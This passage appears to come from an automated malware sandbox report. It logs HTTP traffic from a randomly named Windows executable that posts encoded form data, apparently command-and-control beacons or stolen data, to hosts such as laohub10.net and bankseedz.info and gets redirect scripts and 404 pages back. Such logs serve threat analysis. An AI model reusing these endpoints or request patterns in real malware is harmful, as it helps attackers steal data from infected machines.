3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49904	23.225.160.132	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:29:20.137379885 CET	766	OUT	POST /n2c9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 210 Connection: close Host: www.laohub10.net Origin: http://www.laohub10.net Referer: http://www.laohub10.net/n2c9/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 36 7a 58 62 63 4e 54 37 53 75 33 38 58 75 65 58 6d 6a 50 73 5a 6d 73 6d 78 4b 73 2b 47 78 63 54 63 35 73 68 4d 4c 2b 2f 57 6d 49 61 49 6b 4d 77 77 4b 68 67 37 55 6a 45 59 53 48 65 37 43 62 73 45 56 30 78 6c 43 55 6c 6f 52 33 4c 41 62 54 62 4f 43 74 2f 4c 75 30 52 49 6e 74 38 42 73 59 6c 6b 59 6f 73 6a 43 7a 4d 79 74 4d 79 46 4e 33 68 36 53 58 44 63 71 4c 54 38 49 68 4e 44 31 75 75 6f 79 48 47 78 72 54 62 2f 46 46 5a 4a 63 37 4f 75 6e 6c 39 58 4e 48 35 4d 4c 44 49 78 39 67 38 37 6d 55 42 73 36 78 2f 72 30 52 63 7a 6e 6c 68 6e 78 50 2f 61 74 71 44 4f 53 30 76 33 6c 7a 49 47 77 32 73 79 76 44 35 6e 59 68 46 Data Ascii: ftMDw=6zXbcNT7Su38XueXmjPsZmsmxKs+GxcTc5shML+/WmIaIkMwwKhg7UjEYSHe7CbsEV0xlCUloR3LAbTbOCt/Lu0RInt8BsYlkYosjCzMytMyFN3h6SXDcqLT8IhND1uuoyHGxrTb/FFZJc7Ounl9XNH5MLDIx9g87mUBs6x/r0RcznlhnxP/atqDOS0v3lzIGw2syvD5nYhF
Nov 24, 2024 08:29:21.255311012 CET	532	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 357 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49911	23.225.160.132	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:29:22.880951881 CET	790	OUT	POST /n2c9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 234 Connection: close Host: www.laohub10.net Origin: http://www.laohub10.net Referer: http://www.laohub10.net/n2c9/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 36 7a 58 62 63 4e 54 37 53 75 33 38 59 75 75 58 72 67 58 73 52 6d 73 6c 30 4b 73 2b 4d 52 63 58 63 35 6f 68 4d 4f 65 57 58 55 38 61 4a 47 55 77 78 49 4a 67 34 55 6a 45 51 79 48 62 31 69 62 33 45 56 6f 54 6c 48 38 6c 6f 52 6a 4c 41 61 6a 62 4a 31 35 38 4c 2b 30 54 4f 6e 74 2b 4f 4d 59 6c 6b 59 6f 73 6a 43 57 72 79 74 45 79 46 64 6e 68 34 7a 58 43 48 4b 4c 55 73 59 68 4e 48 31 75 71 6f 79 48 6b 78 71 66 68 2f 41 42 5a 4a 5a 58 4f 75 32 6c 36 5a 4e 48 2f 52 62 43 5a 33 50 31 6a 35 41 59 5a 6e 49 56 6d 71 6b 78 55 79 52 34 37 37 43 50 63 49 39 4b 42 4f 51 73 64 33 46 7a 69 45 77 4f 73 67 34 50 65 6f 73 45 6d 61 4b 32 73 32 7a 55 55 4e 54 6b 65 50 4f 48 59 66 48 4d 75 58 41 3d 3d Data Ascii: ftMDw=6zXbcNT7Su38YuuXrgXsRmsl0Ks+MRcXc5ohMOeWXU8aJGUwxIJg4UjEQyHb1ib3EVoTlH8loRjLAajbJ158L+0TOnt+OMYlkYosjCWrytEyFdnh4zXCHKLUsYhNH1uqoyHkxqfh/ABZJZXOu2l6ZNH/RbCZ3P1j5AYZnIVmqkxUyR477CPcI9KBOQsd3FziEwOsg4PeosEmaK2s2zUUNTkePOHYfHMuXA==
Nov 24, 2024 08:29:24.090465069 CET	532	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 357 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49920	23.225.160.132	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:29:25.546107054 CET	1803	OUT	POST /n2c9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1246 Connection: close Host: www.laohub10.net Origin: http://www.laohub10.net Referer: http://www.laohub10.net/n2c9/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 36 7a 58 62 63 4e 54 37 53 75 33 38 59 75 75 58 72 67 58 73 52 6d 73 6c 30 4b 73 2b 4d 52 63 58 63 35 6f 68 4d 4f 65 57 58 55 6b 61 4a 31 63 77 7a 70 4a 67 35 55 6a 45 61 53 48 61 31 69 62 36 45 56 67 58 6c 48 78 48 6f 54 62 4c 43 38 33 62 4d 41 56 38 42 2b 30 54 43 48 74 2f 42 73 59 77 6b 59 5a 72 6a 43 47 72 79 74 45 79 46 59 72 68 38 69 58 43 46 4b 4c 54 38 49 68 42 44 31 75 4f 6f 79 66 4f 78 71 62 78 2f 7a 4a 5a 49 34 37 4f 6f 41 52 36 47 39 48 39 51 62 43 42 33 50 70 47 35 47 39 33 6e 4d 64 59 71 6e 74 55 79 57 67 67 38 6a 75 45 56 50 61 62 4f 68 55 70 7a 6a 6a 32 49 67 2b 69 67 65 4c 50 72 74 49 33 58 75 6e 77 36 77 52 62 4f 42 41 70 51 5a 36 4b 53 6b 4d 6c 53 4a 61 33 46 31 52 4d 6d 34 54 68 73 66 43 70 50 59 4d 32 31 70 33 45 61 68 69 72 70 45 58 2f 6a 4e 62 58 2b 6f 30 63 6d 42 71 34 50 4a 64 35 4c 39 70 72 38 7a 47 76 66 54 53 30 5a 5a 2b 66 52 56 66 32 66 71 41 48 48 54 52 70 68 6d 33 2f 52 51 34 44 6d 42 71 75 5a 54 45 67 54 48 74 35 6c 78 65 52 59 65 52 57 59 46 42 39 [TRUNCATED] Data Ascii: ftMDw=6zXbcNT7Su38YuuXrgXsRmsl0Ks+MRcXc5ohMOeWXUkaJ1cwzpJg5UjEaSHa1ib6EVgXlHxHoTbLC83bMAV8B+0TCHt/BsYwkYZrjCGrytEyFYrh8iXCFKLT8IhBD1uOoyfOxqbx/zJZI47OoAR6G9H9QbCB3PpG5G93nMdYqntUyWgg8juEVPabOhUpzjj2Ig+igeLPrtI3Xunw6wRbOBApQZ6KSkMlSJa3F1RMm4ThsfCpPYM21p3EahirpEX/jNbX+o0cmBq4PJd5L9pr8zGvfTS0ZZ+fRVf2fqAHHTRphm3/RQ4DmBquZTEgTHt5lxeRYeRWYFB9A7EV5TaKe6qZkJxSpI2ngVQKMmSguS+LjIm0lcs2rhqrc9++sv3zp86LWXiG7YXUTJtVoZYhesu5nhnJAKtTFIaB483nha5K3FjPu8RhLOffYNKNgMbMuSfAyzUBA1xTEiWzZzuP5Wo9XFbIn0IkdyIw5aeZCre+rO79svAUXCVpAGTwj3yqUtM+QEWCuIoZg7UseaGLrkBfRccJLUZRE2Yncuscg6nh95tNCv9Z0+T/V3W99CjGswqF5RxRjGkeQ602R6NN7KPHejJMnFsgPuxSjTHy91n3OG+PqTba6VDivY8ChWuow6K8psXWSZtpA/+DcMme7w2/zWy1cNG61Ap4ar2b0pABIixLk0qYA3R6SNsZAi/joNktPx2Y+/Nznl3hkFpJq/GwAlyiZF5l9TeXuzMSl7yi5+66hZuNK3B7ZjtfH64HWSqzAHllowybF8IYbesiYRqTZAyJBE3X40YcR2NI08X7cof8SS6hDvI2FJ3HPQ+eXCO7oYaykwHsZ2B/86ltci1c2ONuvvCwCCf+emwEpsmXG1gaLTUb4qyAi672DHW6MkltaFzlcx9hUOntaaA5UO5/5RqRbvkU0+QOK25SmM/cI4itJhT3vp0ASq5SneJk4IUcq5EuJbUvpat5xrTcDYawsx7sr7tAiRrNCA35EGkZnr [TRUNCATED]
Nov 24, 2024 08:29:26.728163958 CET	532	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 357 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49927	23.225.160.132	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:29:28.215060949 CET	515	OUT	GET /n2c9/?ftMDw=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/CPoWBEtyT9QkzZx0kn+vpM9MetzAzCeiDLL5rMhSVwK26gXmhOI=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close Host: www.laohub10.net User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Nov 24, 2024 08:29:29.399141073 CET	532	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 357 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49943	46.30.211.38	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:29:35.151686907 CET	772	OUT	POST /uf7y/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 210 Connection: close Host: www.bankseedz.info Origin: http://www.bankseedz.info Referer: http://www.bankseedz.info/uf7y/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 6f 72 59 56 50 2b 49 38 54 31 4a 78 35 76 6f 44 78 6d 33 75 6e 6c 48 68 4e 6b 4c 36 6b 74 57 76 55 37 76 64 74 4a 4c 70 41 45 45 32 6d 45 48 58 50 77 67 66 41 6f 4b 62 6a 2b 4e 69 61 61 36 72 75 45 4d 66 31 4f 38 7a 36 59 70 4c 6e 65 53 58 4f 45 4a 43 47 51 45 2b 35 6d 67 44 39 51 66 42 58 35 7a 32 46 32 33 69 76 4f 31 4e 79 5a 67 68 64 6d 33 49 71 59 41 52 6d 6f 34 52 34 44 30 6d 4b 32 57 36 37 65 56 46 4a 4f 47 34 64 4b 76 79 5a 36 35 6f 71 31 6f 6a 58 53 54 30 44 54 39 61 6a 47 37 73 38 6e 78 2f 34 6b 6b 70 5a 75 35 42 41 57 31 47 79 33 68 6e 4d 66 51 4f 77 4e 44 55 Data Ascii: ftMDw=a+/R7g38sexoorYVP+I8T1Jx5voDxm3unlHhNkL6ktWvU7vdtJLpAEE2mEHXPwgfAoKbj+Niaa6ruEMf1O8z6YpLneSXOEJCGQE+5mgD9QfBX5z2F23ivO1NyZghdm3IqYARmo4R4D0mK2W67eVFJOG4dKvyZ65oq1ojXST0DT9ajG7s8nx/4kkpZu5BAW1Gy3hnMfQOwNDU
Nov 24, 2024 08:29:36.487171888 CET	738	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Nov 2024 07:29:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49949	46.30.211.38	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:29:37.846282959 CET	796	OUT	POST /uf7y/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 234 Connection: close Host: www.bankseedz.info Origin: http://www.bankseedz.info Referer: http://www.bankseedz.info/uf7y/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 35 2b 49 56 63 4a 30 38 53 56 4a 79 32 50 6f 44 6d 32 33 31 6e 6c 37 68 4e 68 7a 55 6e 62 6d 76 55 62 66 64 73 49 4c 70 4f 6b 45 32 31 45 48 57 58 51 67 41 41 6f 50 6d 6a 2b 78 69 61 61 75 72 75 42 6f 66 31 39 55 77 72 59 70 4a 76 2b 53 56 4b 45 4a 43 47 51 45 2b 35 6d 6c 4c 39 51 48 42 58 49 44 32 58 45 66 6a 7a 65 31 4f 7a 5a 67 68 5a 6d 32 67 71 59 41 2f 6d 70 6b 33 34 46 77 6d 4b 7a 53 36 37 72 70 4b 65 65 47 45 5a 4b 75 57 55 61 45 4b 6b 48 31 62 53 67 4f 59 64 6a 68 59 6d 77 6d 32 67 55 78 63 71 30 45 72 5a 73 68 7a 41 32 31 73 77 33 5a 6e 65 49 63 70 2f 35 6d 33 5a 76 48 74 73 45 42 51 72 79 6f 58 46 61 36 47 4f 52 77 35 6a 41 3d 3d Data Ascii: ftMDw=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnbmvUbfdsILpOkE21EHWXQgAAoPmj+xiaauruBof19UwrYpJv+SVKEJCGQE+5mlL9QHBXID2XEfjze1OzZghZm2gqYA/mpk34FwmKzS67rpKeeGEZKuWUaEKkH1bSgOYdjhYmwm2gUxcq0ErZshzA21sw3ZneIcp/5m3ZvHtsEBQryoXFa6GORw5jA==
Nov 24, 2024 08:29:39.144932985 CET	738	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Nov 2024 07:29:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49955	46.30.211.38	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
